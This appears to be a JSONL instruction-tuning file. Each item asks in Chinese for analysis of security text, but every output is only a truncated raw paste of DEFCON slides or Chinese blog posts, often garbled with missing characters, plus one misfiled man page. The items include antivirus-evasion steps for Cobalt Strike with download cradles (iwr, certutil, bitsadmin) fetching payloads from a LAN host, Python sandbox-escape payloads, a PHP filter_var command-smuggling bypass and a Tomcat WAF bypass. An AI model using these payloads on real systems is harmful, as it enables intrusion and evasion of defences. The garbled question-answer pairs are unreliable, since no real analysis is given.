{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nPIG: Finding Truffles Without Leaving A Trace Ryan Linn DEFCON 19 Copyright Trustwave 2010 Overview  Introduction  Why are we here ?  How will this help me ?  Talking is boring show me  Thats neat, how does this work ?  Protocols and Plugins  Remediation Copyright Trustwave 2010 Introduction Ryan Linn / Senior Security Consultant at Trustwave  Member of SpiderLabs team at Trustwave  Contributor to Metasploit, BeEF, and other open source projects  Interests:  Process streamlining through tool integration, sharing knowledge, Metasploit, making security knowledge accessible  Twitter: @sussurro  Web: www.happypacket.net Copyright Trustwave 2010 Why are we here ? Passive Network Information Gathering  Identify hosts/resources on a network  Profile individuals/applications  Determine network architecture  Machine/domain/individual naming schemes Completely Silent  No IP address required  No Man-In-The-Middle required Copyright Trustwave 2010 Why are we here ?  Understand what is on your network  Deep Packet Parsing sounds like fun  Make this information easier for everyone to access  How to leverage this for pen tests  Waiting here for the next talk.. Copyright Trustwave 2010 How will this help me? SysAdmin/User  Know what traffic you are transmitting  Are you tipping your hand by just being on the network ? Pen Tester  Understand what information you can use to profile a network without anyone knowing youre there Everyone  Make this process easier  Use Metasploit Database to help process/manage data  Organize and manage results with Dradis  How to stay quiet on a network Copyright Trustwave 2010 Talking is boring, show me Demo Time  Demo 1  Gathering Data  Use Metasploit PIG modules to parse traffic and save data to the database  Demo 2  Viewing data with Metasploit  Use Metasploit msfconsole to view collected data  Demo 3  Using Dradis to view information  Import Metasploit data into Dradis to view data  Demo 4  PWN Plug and PIG Copyright Trustwave 2010 Thats neat, how ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nMouse Jiggler Offense & Defense Dr. Phil @ppolstra Why this talk?  Mouse jigglers now standard for LEOs  Full disk encryption is worthless if logged in  Building your own jiggler can be fun What is a mouse jiggler?  Used to keep computer awake & unlocked  Can be used as a prank  Types  Software  Not what this talk is about  Hardware  The one to be worried about Detecting a Mouse Jiggler  Known VID/PID (0x0E90)/(0x0028 or 0x0045)  Behavior  USB device class Detection via known VID/PID  Single manufacturer of jigglers used today  Detection is:  Quick  Easy  Definite Introduction to udev rules  Determine what happens when new devices attached  Set of matching conditions  Any scripts launched must be short Udev rules for known VID/PID Contents of /etc/udev/rules.d/10-jiggler.rules ACTION==\"add\", ATTRS{idVendor}==\"0e90\", RUN+=\"/etc/udev/scripts/lockscreen.sh\" Don't forget to run sudo service udev restart! Detection based on behavior  Jigglers make periodic small mouse movements  Prank version=machine unusable (short period)  Forensic version has much longer period  Periodic mouse commands can be detected  No clicks, only movement (normally in 1 axis only)  Normally a 2-button mouse  Benign defenses should be applied immediately  Takes a few minutes for this detection Udev rules for behavior detection Contents of /etc/udev/rules.d/10-jiggler2.rules ACTION==\"add\", RUN+=\"/etc/udev/scripts/jiggler- detect.sh ${BUSNUM} ${DEVNUM}&\" Don't forget to run sudo service udev restart! Detection script for behavior  Use usbhid-dump to dump HID reports  Must be run with root privileges  Relies on no-click behavior (among other things) Jiggler-detect.sh #!/bin/bash # Mouse jiggler detector # Usage: jigggler-detect.sh <USB bus> <USB device address> # # Created by Dr. Phil Polstra for DEFCON 24 usage () { echo \"Usage: $0 <USB bus> <USB device address>\" echo \"This script will attempt to detect a mouse\" echo \"jiggler based on behavior.\" exit 1 } if [ $# -lt 2 ]; then usage fi # mouse jiggle", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nDefCon 23, Las Vegas 2015 Staying Persistent in Software Defined Networks Gregory Pickett, CISSP, GCIA, GPEN Chicago, Illinois gregory.pickett@hellfiresecurity.com Hellfire Security Overview White Box Ethernet Stupid Is As Stupid Does! Exploiting it! Moving Forward Wrapping Up What Is It? Standard Hardware (Blank Slate) Running Merchant Silicon Trident and Broadcom Chipsets Intel, AMD, and PowerPC processors Common Operating System (Often Linux-Based) Critical for Software Defined Networking Can Be Used Without It! Why Do It? Reduced Cost Flexibility Control Traditional DevOps Software Defined Networking Open Compute Project Started By Facebook Total Redesign of Existing Technology To Meet Emerging Needs Specifications for Server, Storage, and the Data Center Designed to be efficient, to be inexpensive, and to be easy to service Open Compute Project Vanity Free and Minimalistic Not Tied To Brands or Anything Proprietary Components Are Abstracted Therefore  Interchangeable Open Network Install Environment (ONIE) Firmware for bare metal network switches Boot Loader for Network Operating Systems (NOS) Grub/U-Boot Underneath Facilitates Installation and Removal of NOS Comes Pre-Installed Automates Switch Deployment White Box Ethernet and ONIE What Could Go Wrong? Weaknesses (Operating System) Privileged Accounts No Root Password Doesnt Force You To Change It! Management Services Uses Telnet SSH Installation Mode (18-bits Entropy) Recovery Mode (26-bits Entropy) Weaknesses (Installer) Predictable URLS Exact URLs from DHCPv4 Inexact URLs based on DHCP Response IPv6 Neighbors TFTP Waterfall Predictable File Name Search Order No Encryption or Authentication for Installs Weaknesses (Implementation) Exposed Partition No Secure Boot What Does This Mean? Lots Of Opportunities to Blow It Up! Heres How Compromise Its Installations Via Rogue DHCP Server Via IPv6 Neighbor Via TFTP Compromise It Forced Reboot Entry Sniffing/MiTM (Telnet or SSH) Even Better Compromise It Get Past Net", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nTrust Transience: Post Intrusion SSH Hijacking July 2k5  Blackhat USA 05 & Defcon 0x0D So you're a sneaky Blackhat... The Target Recon  Mail headers say MUA is PINE  .sig says Debian Sarge, kernel 2.4.22  Web logs suggest egress HTTPS traffic doesn't go via a proxy (source address is their NAT router, not HTTP proxy) The Plan Let's Do It haxor:~$ nc -l -p 1337 admin@box:~$ id uid=1004(admin) gid=1004(admin) groups=1004(admin) admin@box:~$ ps auxw | grep -q pine || echo shit shit admin@box:~$ ls core core admin@box:~$ uname -nsr Linux box 2.6.11 haxor:~$ ./pine0day | spoofmail -f 'Mr. Mbeki' -s 'Opportunity for joo!' admin@target.com Things start to unravel admin@box:~$ w USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT admin pts/1 :0 09:28 10.3m 3.1s 0.2s bash admin pts/2 :0 09:31 1.0s 1.4s 0.9s bash admin pts/3 haxor.com 14:03 0.0s 0.3s 0.3s w admin@box:~$ ps x 3132 ? S 0:23 xfwm4 -daemon sm-client-id 34235 3590 ? S+ 0:05 xterm -rv 3593 pts/1 Ss+ 0:02 bash 3597 pts/1 S+ 0:12 ssh root@ns1.target.com 9034 ? S+ 0:03 xterm -rv 9036 pts/2 Ss+ 0:02 bash 9154 pts/3 R+ 0:00 ps x +++ATH0  Things have gone pearshaped  Haven't got root, are about to get busted  Time to drop carrier and run?  But that SSH session, oh so close.  If only there was a way to get to the other end of that SSH... There is a way admin@box:~$ <Ctrl-A>:!!!!mafl-load ssh-jack 3597 haxor.com 1338 Connecting to /usr/bin/ssh running as pid 3597... Connected Ferreting out some useful symbols... Located libc symbol 'socket' at 0xb7e19a50 Located libc symbol 'connect' at 0xb7e195c0 Located libc symbol 'select' at 0xb7e12490 Located section '.got' 0x0807eb8c to 0x0807eef4 Located section '.plt' 0x0804aa68 to 0x0804b7d8 Located section '.text' 0x0804b7e0 to 0x08070450 Located section '.rodata' 0x08070480 to 0x0807dd6c Resolved dynamic symbol 'socket' at PLT: 0x0804b6b8 GOT: 0x0807eea8 Resolved dynamic symbol 'select' at PLT: 0x0804ad88 GOT: 0x0807ec5c Resolved dynamic symbol 'connect' at PLT: 0x0804b5f8 GOT: 0x0807ee78 ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nSocial attacks against anonymity networks Nick Mathewson The Tor Project <nickm@torproject.org> Defcon XV Aug 4, 2007 That title was confusing!  What I mean by social attacks.  What I mean by anonymity network.  How to be a more effective social engineer. Not covered here  Intro to anonymity networks.  Basics of traffic analysis  Why use social engineering?  Trivial attacks: no traffic analysis required.  Attacks to help traffic analsysis.  Traffic gathering: more input for your attack.  Network partitioning: better input for your attack.  Defenses Outline Basic idea: anonymity networks hide users among users... Alice2 Bob1 Bob2 Alice1 Alice3 Network ...but when users act differently, an observer can tell them apart. Alice2 Bob1 Bob2 Alice1 Alice3 Network ...and separating users keeps them from blending. Alice2 Bob1 Bob2 Alice1 Alice3 Network Network We use distributed networks so no one server can compromise users' traffic S S S S S S S S S Alice2 Bob1 Bob2 Alice1 Ex.: Tor, Remailers, Mixminion... Alice3 Against low-latency networks: watch both ends and correlate traffic. S S S S S Bob2 Alice1 .. ... . ... . .. ... . ... . If patterns (approximately) match, Alice1 is talking to Bob2. ex: Tor, Freedom, Pipenet, I2P, JohnDoe, Freenet Against high-latency networks: compare net with Alice to net without. This (long-term intersection) attack needs lots of traffic. Bob1 Bob2 Bob3 Bob4 Alice Sending 10 13 8 2 Alice not sending 9 13 8 1 So why not always use high-latency nets? Tooslow. ex: cpunk, MixMaster, Mixminion So, what should a smart attacker do?  If possible, try to remove benefits of network from user.  Otherwise, try to speed up traffic analysis.  Get more traffic.  Make the traffic you get more useful.  Lower volume of background traffic (High-latency nets only.) Never attribute to malice...  Caveat 1: Many harmful ideas occur to people spontaneously.  Caveat 2: Many harmful ideas are true. I. Trivial attacks Or, Were jumping off a cliff. Wanna come? Why attack the network ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nPHP filter_var Bypass 截 2022.03.27 官补 丁 0x00 前 本是对章 PHP filter_var shenanigans中所表述内容的进步测试和学习研究记录 测试环境macOS Mojave + PHP 7.4.28 + gdb 0x01 本地环境搭建 下载并切换到希望调试的源码环境 这仅开启必要的扩展组件来编译 编译时可能会遇到如下报错 git clone https://github.com/php/php-src cd php-src/ git checkout PHP-7.4.28 1 2 3 ./buildconf --force ./configure --disable-all --enable-filter --enable-cli --enable-debug -- with-iconv=$(brew --prefix libiconv) --prefix=/opt/phptest/ --with-config- file-path=/opt/phptest/php.ini make -j8 make install 1 2 3 4 /Users/zero/Desktop/php-src/main/reentrancy.c:125:23: error: too few arguments to function call, expected 3, have 2 readdir_r(dirp, entry); ~~~~~~~~~  /Library/Developer/CommandLineTools/SDKs/MacOSX.sdk/usr/include/dirent.h:110 :5: note: 'readdir_r' declared here int readdir_r(DIR *, struct dirent *, struct dirent **) __DARWIN_INODE64(readdir_r);  1 error generated. make: *** [main/reentrancy.lo] Error 1 1 2 3 4 5 6 7 8 就是这个函数在macOS sdk的定义与PHP源码中调不符合造成的修改对应的源码位置为如 下值即可因为第三个值就是第个值得指针已 PS: 要是实在报错过多解决不了就去PHP官下载对应版本的PHP源码吧 变异完成之后执 php -v 会显示 DEBUG  配置件的位置也是在我们先前指定的地 没看过PHP内核的可以去微信读书上搜 PHP 7 底层设计与源码实现我觉得少这本在讲 话 后主要的个录是 ext 因为 system 函数的实现在这个地 ext 官扩展录包括了绝多数PHP的函数的定义和实现如array系列pdo系列spl系 列等函数的实现都在这个录中个写的扩展在测试时也可以放到这个录便测试 和调试 0x02 PHP filter_var Bypass 函数使说明 漏洞说明如果使 PHP 的filter_var函数检查主机名并且传递给函数的值太zend就不会执 对标字符串的检查这会导致主机名检查被完全绕过 本地测试先要修改 php.ini 中的 memory_limit = -1 因为该漏洞的超字符串需要你分 配4G的内存这个也是该漏洞鸡肋的原因因为默认是128MB线上服务器也不会让你下发 readdir_r(dirp, entry ,&entry); 1 filter_var(mixed $value, int $filter = FILTER_DEFAULT, array|int $options = 0): mixed 1 个4GB的字符过去 上的代码执之后会输出 success说明成功bypass 0x03 命令执 NO  但是我测试了章中给出的案例虽然可以bypass但是并不能成功命令执简化的代码段如 下所示 这使CLion来进调试配置调试很简单把源码CLion打开然后按照如下式编辑下就 <?php <?php // normal usage var_dump(filter_var(\"example.com\", FILTER_VALIDATE_DOMAIN, FILTER_FLAG_HOSTNAME)); // filter bypass // var_dump(filter_var(\"5;id;\" . str_repeat(\"a\", 4294967286) . \"a.com\", FILTER_VALIDATE_DOMAIN, FILTER_FLAG_HOSTNAME)); if (filter_var(\"5;id;\" . str_repeat(\"a\", 4294967286) . \"a.com\", F", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Python 沙盒 所谓的 Python 沙盒即以一定的方法模拟 Python 终端实现用户对 Python 的使用 ## Python 沙箱逃逸的一些方法 我们通常所说的 Python 沙箱逃逸就是绕过模拟的 Python 终端最终实现命令执行 ### 导入模块 在 Python 的内建函数中有一些函数可以帮助我们实现任意命令执行 ``` os.system() os.popen() commands.getstatusoutput() commands.getoutput() commands.getstatus() subprocess.call(command, shell=True) subprocess.Popen(command, shell=True) pty.spawn() ``` 在 Python 中导入模块的方法通常有三种xxx 为模块名称 1. `import xxx` 2. `from xxx import *` 3. `__import__('xxx')` 我们可以通过上述的导入方法导入相关模块并使用上述的函数实现命令执行 除此之外我们也可以**通过路径引入模块** 如在 linux 系统中 Python 的 os 模块的路径一般都是在 `/usr/lib/python2.7/os.py`当知道路径的时候我们就可以通过如下的操作导入模块然后进一步使用相关函数 ```py >>> import sys >>> sys.modules['os']='/usr/lib/python2.7/os.py' >>> import os >>> ``` **其他的危险函数举例** 如 **execfile** 文件执行 ```py >>> execfile('/usr/lib/python2.7/os.py') >>> system('cat /etc/passwd') root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin ... >>> getcwd() '/usr/lib/python2.7' ``` **timeit** ```py import timeit timeit.timeit(\"__import__('os').system('dir')\",number=1) ``` ** exec 和 eval 比较经典了** ```py eval('__import__(\"os\").system(\"dir\")') ``` **platform** ```py import platform print platform.popen('dir').read() ``` 但是正常的 Python 沙箱会以黑名单的形式禁止使用一些模块如 os 或以白名单的形式只允许用户使用沙箱提供的模块用以阻止用户的危险操作而如何进一步逃逸沙箱就是我们的重点研究内容 ### Python 的内建函数 当我们不能导入模块或者想要导入的模块被禁那么我们只能寻求 Python 本身内置函数即通常不用人为导入Python 本身默认已经导入的函数我们可以通过可以通过 `dir __builtin__` 来获取内置函数列表 ```python >>> dir(__builtins__) ['ArithmeticError', 'AssertionError', 'AttributeError', 'BaseException', 'BufferError', 'BytesWarning', 'DeprecationWarning', 'EOFError', 'Ellipsis', 'EnvironmentError', 'Exception', 'False', 'FloatingPointError', 'FutureWarning', 'GeneratorExit', 'IOError', 'ImportError', 'ImportWarning', 'IndentationError', 'IndexError', 'KeyError', 'KeyboardInterrupt', 'LookupError', 'MemoryError', 'NameError', 'None', 'NotImplemented', 'NotImplementedError', 'OSError', 'OverflowError', 'PendingDeprecationWarning', 'Re", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 WEB实之Burp的AutoRepeater使 LxLN 前 LxLO 安装法 LxLP 使例 LxLP.N ssrf检测 LxLP.O 未授权检测 LxLP.P 越权检测 LxLQ 其它 0x01 前 0x02 安装法 Plain Text 复制代码 以前想写个SSRF的检测具,后和朋友聊,感觉直使的AutoRepeater就可以做到 尝试使了这么久,使这个插件挖到的漏洞也不少了,感觉是真实可的 于是作为个专业的狗推,我就要开始推荐AutoRepeater了 它作为个burp具,可以极的简化测试的效率 我常于该具拿来检测SSRF,未授权,越权(平,垂直) 下就简单介绍下,如何检测,来给你们进狗推 1 2 3 4 5 6 Plain Text 复制代码 github地址: https://github.com/nccgroup/AutoRepeater 下载完成以后,burp的Extender界中,导AutoRepeater.jar 即可 1 2 2 0x03 使例 0x03.1 ssrf检测 Plain Text 复制代码 这是我使最多的种了,很,也靠这样检到了不少ssrf漏洞 先做两个准备 1. 个dnslog,个推荐http://ceye.io 2. 准备两个正则: (?i)(https|http|file)://.* 与 (?i)(https|http|file)%3A%2F%2F.* 第个正则,保证未编码的URL可以被正常匹配到 第个正则,保证编码的URL可以被正常匹配到 1 2 3 4 5 6 7 8 9 10 11 3 Plain Text 复制代码 然后配置如下规则: 正则的作就是匹配URL然后替换成DNSLOG的地址,接着动发包 然后在有空的时候去看看DNSLOG有没有数据或是把所有带URL的测试遍就知道有没有SSRF了 减少了漏包的可能性 1 2 3 4 4 Plain Text 复制代码 然后放着等待有缘的URL即可 例如: 本地起环境 http://192.168.24.145/ssrf.php? aa=123123123&t=hTtp://baidu.com&c=httP://4399.com 然后burp代理以后去访问 1 2 3 4 5 5 如下操作: 0x03.2 未授权检测 Plain Text 复制代码 例如: 登录完毕以后会在COOKIE中返回个BIDUPSID,这个BIDUPSID表示登录凭证 也就是Cookie: BIDUPSID=111111111 那么假设我们把Cookie: BIDUPSID=111111111修改为Cookie: test=test; 然后对请求包,如果两个请求包的响应包是类似的,那不就说明未授权么? 1 2 3 4 6 0x03.3 越权检测 Plain Text 复制代码 例如: 登录完毕以后会在header头返回个 user-token: userid=1表示登录凭证 那么想测试越权(平,垂直)也很简单 如果想测试平越权那就准备两个权限摸样的账号 如果想测试垂直越权那就准备个权限,个低权限的账号 管理员账号1 user-token: userid=1 普通户账号2 user-token: userid=998 浏览器登录,管理员账号1 然后burp抓包 接着使AutoRepeater正则替换user-token为userid=998 然后查看数据包,如果两个请求包的响应包是类似的,那不就说明有问题么? 1 2 3 4 5 6 7 8 9 10 11 12 7 如何设置域名名单? 如下设置即可,注意哦: 设置这个只是表示界显示对应的数据已,实际上还是发了包的 0x04 其它 8", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nTransferability of Adversarial Examples to Attack Cloud-based Image Classification Service Dou Goodman(兜哥) @ Our Team X-Lab AI#Security#Research#@ Open#Source#Projects: Todays Topics Cloud-based Image Classifier Service +perturbation Origin Adversary Class:#Cat# Score:#0.99 Class:#Flesh# Score:#0.99 Black-box Attack Demo:Fool Google Image Search Demo:Fool Google Image Search Attacks Overview l We#propose#Fast#Featuremap#Loss#PGD(FFL- PGD)##untargeted#attack#based#on#Substitution# model#,which#achieve#a#high#evasion#rate#with#a# very#limited#number#of#queries.## l Instead#of#millions#of#queries#in#previous#studies,# our#method#find#the#adversarial#examples#using# average#only#one#or#two#of#queries.## White-box Attack is Easy The#attacker#knows#the#network#structure#and# parameters,#and#has#unlimited#access#to#model#input Black-box Attack is Difficult The#attacker#can##unlimited#access#to#model#input Unknown#Model# Unknown#parameters# Unknown#network#structure# Attack Cloud-based Image Classifier Service is More Difficult ! Unknown#Model# Unknown# Preprocessing# Unknown#parameters# Unknown#network#structure# resize,crop,blur, The#attacker#can##only# access#to#model#input#with# unknown#preprocessing#and#limited#queries### Keeping#model#in#cloud#provides#a#FALSE# sense#of#security#! (Img#from:# http://www.sohu.com/a/215163641_115479) Steps of Our Attack Step1:Substitute#Model#Training# Step2:Adversarial#Sample#Crafting## ## Step#1## Step#2## Substitute Model Training(1)  We#can#DNNs#which# pretrained#on#ImageNet# as#our#substitute# model#.#  Better#top-1#accuracy# means#stronger#feature# extraction#capability.## Top1 vs. network. Top-1 validation accuracies for top scoring single-model architectures (Img from https //arxiv org/abs/1605 07678v1) Substitute Model Training(2)  We#simplify#untargeted#attack#into#binary# classification#problem#:Cat#or#not?#  We#fix#the#parameters#of#the#feature#layer#and# train#only#the#full#connection#layer#of#the#last# layer.## # feature#l", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n.\\\" DO NOT MODIFY THIS FILE! It was generated by help2man 1.48.5. .\\\"******************************************************************* .\\\" .\\\" This file was generated with po4a. Translate the source file. .\\\" .\\\"******************************************************************* .TH WC 1 2022年9月 \"GNU coreutils 9.1\" 用户命令 .SH 名称 wc \\- 输出文件中的行数单词数字节数 .SH 概述 \\fBwc\\fP [\\fI\\,选项\\/\\fP]... [\\fI\\,文件列表\\/\\fP]... .br \\fBwc\\fP [\\fI\\,选项\\/\\fP]... \\fI\\,\\-\\-files0\\-from=F\\/\\fP .SH 描述 .\\\" Add any additional description here .PP 对每个文件输出行单词和字节统计数如果指定的文件多于一个则同时输出总行数单词指以空白字符分隔的长度非零的可打印字符序列 .PP 如果没有指定文件或者指定文件为\\-则从标准输入读取 .PP 下列选项可被用来选择应该显示哪些计数信息它们总是按照行数单词数字符数字节数最大行长度的顺序显示 .TP \\fB\\-c\\fP, \\fB\\-\\-bytes\\fP 输出字节统计数 .TP \\fB\\-m\\fP, \\fB\\-\\-chars\\fP 输出字符统计数 .TP \\fB\\-l\\fP, \\fB\\-\\-lines\\fP 输出换行符统计数 .TP \\fB\\-\\-files0\\-from\\fP=\\fI\\,F\\/\\fP 将文件F 中的以 NUL 结尾的名字所指定的文件作为待统计文件如果文件F 为\\-则从标准输入读取这些名字 .TP \\fB\\-L\\fP, \\fB\\-\\-max\\-line\\-length\\fP 打印最大显示宽度 .TP \\fB\\-w\\fP, \\fB\\-\\-words\\fP 输出单词统计数 .TP \\fB\\-\\-help\\fP 显示此帮助信息并退出 .TP \\fB\\-\\-version\\fP 显示版本信息并退出 .SH 作者 由 Paul Rubin 和 David MacKenzie 编写 .SH 报告错误 GNU coreutils 的在线帮助 <https://www.gnu.org/software/coreutils/> .br 请向 <https://translationproject.org/team/zh_CN.html> 报告翻译错误 .SH 版权 Copyright \\(co 2022 Free Software Foundation, Inc. License GPLv3+: GNU GPL version 3 or later <https://gnu.org/licenses/gpl.html>. .br This is free software: you are free to change and redistribute it. There is NO WARRANTY, to the extent permitted by law. .SH 参见 完整文档请见 <https://www.gnu.org/software/coreutils/wc> .br 或者在本地使用 info \\(aq(coreutils) wc invocation\\(aq", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nLaboratory for Dependable Distributed Systems  RWTH Aachen University NoSEBrEaK - Defeating Honeynets Maximillian Dornseif, Thorsten Holz, Christian N. Klein at Laboratory for Dependable Distributed Systems  RWTH Aachen University Who and Why Laboratory for Dependable Distributed Systems  RWTH Aachen University Honeynet Honeywall Honeypots Honeynets Laboratory for Dependable Distributed Systems  RWTH Aachen University Sebek [...] monitoring capability to all activity on the honeypot including, but not limited to, keystrokes. If a file is copied to the honeypot, Sebek will see and record the file, producing an identical copy. If the intruder fires up an IRC or mail client, Sebek will see those messages. [...] Sebek also provides the ability to monitor the internal workings of the honeypot in a glass-box manner, as compared to the previous black-box techniques. [...] intruders can detect and disable sebek. Fortunately, by the time Sebek has been disabled, the code associated with the technique and a record of the disabling action has been sent to the collection server. Know Your Enemy: Sebek Laboratory for Dependable Distributed Systems  RWTH Aachen University Workings of Sebek  Hijacks sys_read().  Sends data passing through sys_read() over the network.  Overwrites parts of the Network stack (packet_recvmsg) to hide Sebek data passing on the network.  Packages to be hidden are identified by protocol (ETH_P_IP, IPPROTO_UDP), port and magic. Laboratory for Dependable Distributed Systems  RWTH Aachen University Hiding of Sebek  Sebek loads as a kernel module with a random numeric name.  Afterwards a second module is loaded which simply removes Sebek from the list of modules and unloads itself. Laboratory for Dependable Distributed Systems  RWTH Aachen University Detecting Sebek Laboratory for Dependable Distributed Systems  RWTH Aachen University Detecting Sebek Several ways to detect a Sebek infected host come to mind:  (The Honeywall)  Latency  Network traffic counters  Sy", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n勿忘初 - Ch1ng's Blog Thinking and Acting  Links About me Rss 记次 Tomcat 部署 WAR 包拦截绕过的深究 作者: admin 时间: 2022-05-25 分类: 随便写写,开发 项遇到的好玩技巧 0x01 前 在次项中进 Tomcat 后台但是部署 WAR 包的时候被拦截从引发的些列源码审计 0x02 分析过程 在 filename 参数添加 \\ 字符的时候发现成功部署了应并且绕过了 WAF 拦截按照正常逻辑来说这样的包不应该 被成功部署的 定位到 Tomcat 的上传应包的 Servlet - HTMLManagerServlet发现调了 upload 法跟进 发现获取件名了getSubmittedFileName 函数跟进 在getSubmittedFileName函数发现使了HttpParser.unquote函数对件名进处理跟进 通过 Debug 调试得知当件名遇到有 \\ 符号的时候会动的忽略该符号获取下个字符 所以最终的件名由 fu2.\\war 变成了 fu2.war 由于 fu2.\\war 在流量中WAF是不认为它是个危险的后缀所以也就不拦截了往后延伸其实 \\f\\u\\2\\.w\\a\\r 或 者 demo.w\\\\\\\\\\\\ar 等都可以进绕过后续看各位师傅的发挥了 标签: none 添加新评论[持Markdown语法] 登录身份: admin. 退出  内容 * 请输验证码 提交评论 上篇: 解决 Cobalt Strike HTTPS Listener 法在 Win7 运问题 下篇: 没有了  2022 勿忘初 - Ch1ng's Blog. 由 Typecho 强驱动.", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nThe Hackers Guide to The Hackers Guide to Search and Arrest Search and Arrest by Steve Dunker J.D. by Steve Dunker J.D. I. When Can an Officer Legally I. When Can an Officer Legally Stop Stop an individual? an individual? A. Voluntary Stops A. Voluntary Stops B. Investigative Stops B. Investigative Stops C. Administrative Stops C. Administrative Stops D. Road Blocks D. Road Blocks Voluntary Stops Voluntary Stops It is legal for an Officer at any time to It is legal for an Officer at any time to Ask Ask a person to stop and talk. a person to stop and talk. A person has the right to say A person has the right to say yes yes or or no no.. Investigative Stops Investigative Stops Reasonable Suspicion required. Reasonable Suspicion required. Road Blocks Road Blocks Border Checkpoints Border Checkpoints Officers can check everything coming into the Officers can check everything coming into the country. country. Routine searches no RS or PC needed. Routine searches no RS or PC needed. Strip Search: Reasonable suspicion required Strip Search: Reasonable suspicion required Body Cavity: Probable cause Body Cavity: Probable cause Drunk Driving Checkpoints Drunk Driving Checkpoints Checkpoints are valid if procedure is Checkpoints are valid if procedure is followed. followed. Other Roadblocks Other Roadblocks Drivers license, registration, and Insurance Drivers license, registration, and Insurance Checkpoints: Valid Checkpoints: Valid Fleeing felon Checkpoints: Valid Fleeing felon Checkpoints: Valid Crime Witness Checkpoints: Valid Crime Witness Checkpoints: Valid Security Checkpoints: Valid Security Checkpoints: Valid Weigh Stations for trucks: Valid Weigh Stations for trucks: Valid Game Warden: Valid Game Warden: Valid Agricultural Inspection: Valid Agricultural Inspection: Valid When Can an Officer When Can an Officer Legally Arrest an Legally Arrest an individual? individual? All Arrests must be based on All Arrests must be based on Probable Cause. Probable Cause. Probable C", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nPowershell / MsBuild 免杀上线 分享个前段时间学习测试 Powershell / MsBuild 免杀上线 CS 时写的简单混淆脚本 (Shellcode -> ps1, xml)结合 CS Profile 可以免杀上线 360绒Windows Defender 及 Kaspersky脚本主要对脚本中的些特征函数名变量名及些特征字段等进随机成 替换Shellcode 逐字节 xor 解密 混淆脚本代码末或者 https://github.com/inspiringz/python- toys/blob/master/1.Simple%20Shellcode%20Obfuscation%20Code/ssos.py Step 1: CS 成 Python 格式的 Payload payload.py和混淆脚本 ssos.py 放置在同录 下运 python ssos.py payload.py output_filename 即可成 ps1, xml 格式上线脚本 Step 2: 在开启 Defender 实时保护 & 云保护的机器上 MsBuild 执 XML 上线 CS Step 3: CS 端成功免杀上线 2021/07/15 测试的卡巴斯基免杀上线图 Beacon Commands OPSEC 钓上线后先通过进程列表判断当前机器上有哪些杀软做好权限持久化后再进危 操作免得不慎丢失上线的点 Beacon 中内置的依赖 Win32 API 实现的命令: cd cp download drives exit getprivs getuid Beacon 中内置的派进程 + 远程进程注实现的命令杀软对此类为检测较敏感为 危操作 kerberos_ccache_use kerberos_ticket_purge kerberos_ticket_use jobkill kill link ls make_token mkdir mv ppid ps pwd reg query reg queryv rev2self rm rportfwd setenv socks steal_token timestomp unlink upload browserpivot bypassuac covertvpn dcsync desktop elevate execute-assembly hashdump keylogger logonpasswords mimikatz net portscan powerpick psinject pth Windows 件传输 Cheetsheet 测试杀软2021.07.16 绒版本 5.0.62.3 / 病毒库 2021-07-12  360 安全卫版本 13.1.0.1002 / 备库 2021-07-15  卡巴斯基版本 21.3.10.391b  Windows Defender (反恶意软件客户端版本: 4.18.2106.6 / 引擎版本: 1.1.18300.4 / 防 病毒软件版本: 1.343.1035.0)  Powershell Invoke-Web Request 1. runasadmin screenshot shspawn spawn ssh ssh-key wdigest Certutil 1. Bypass 360: bitsadmin 1. curl 1. powershell.exe iwr -uri 192.168.212.1:90/1 -o x # 360, denfender, kaspersky, huorong works powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://192.168.212.1:90/1', 'x') # defender, kaspersky, huorong works, 360 kill certutil -urlcache -f http://192.168.212.1:92/1 x # 360, Kaspersky, Defender not works. Huorong works. certutil -urlcache -f -split http://192.168.212.1:90/1 try # kill certutil -urlcache -f -split crl delete # works certutil -urlcache -f -split http://192.168.212.1:90/1 trydelete # works bitsadmin /transfer name http:/", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nBreaking Secure Bootloaders Talk Outline Smartphones often use signature verification to protect their firmware This is implemented in bootloaders, which can also provide facilities for firmware updates Weaknesses in these update protocols can be exploited to bypass signature protections The core SoC and peripheral chips are both potential targets for attack Biography Christopher Wade Security Consultant at Pen Test Partners @Iskuri1 https://github.com/Iskuri https://www.pentestpartners.com Project One  The SDM660 Android Bootloader I had purchased an Android phone to do mobile research I needed root access in order to use all of my testing tools This required unlocking the bootloader, which disables signature verification protection This required an unlock tool from the manufacturer Custom Bootloader Unlock Functionality Some smartphone manufacturers modify the bootloader to require custom tools for bootloader unlocking, or to remove bootloader unlocking entirely This often requires creating a user account and waiting for a period of time Unlocks are performed 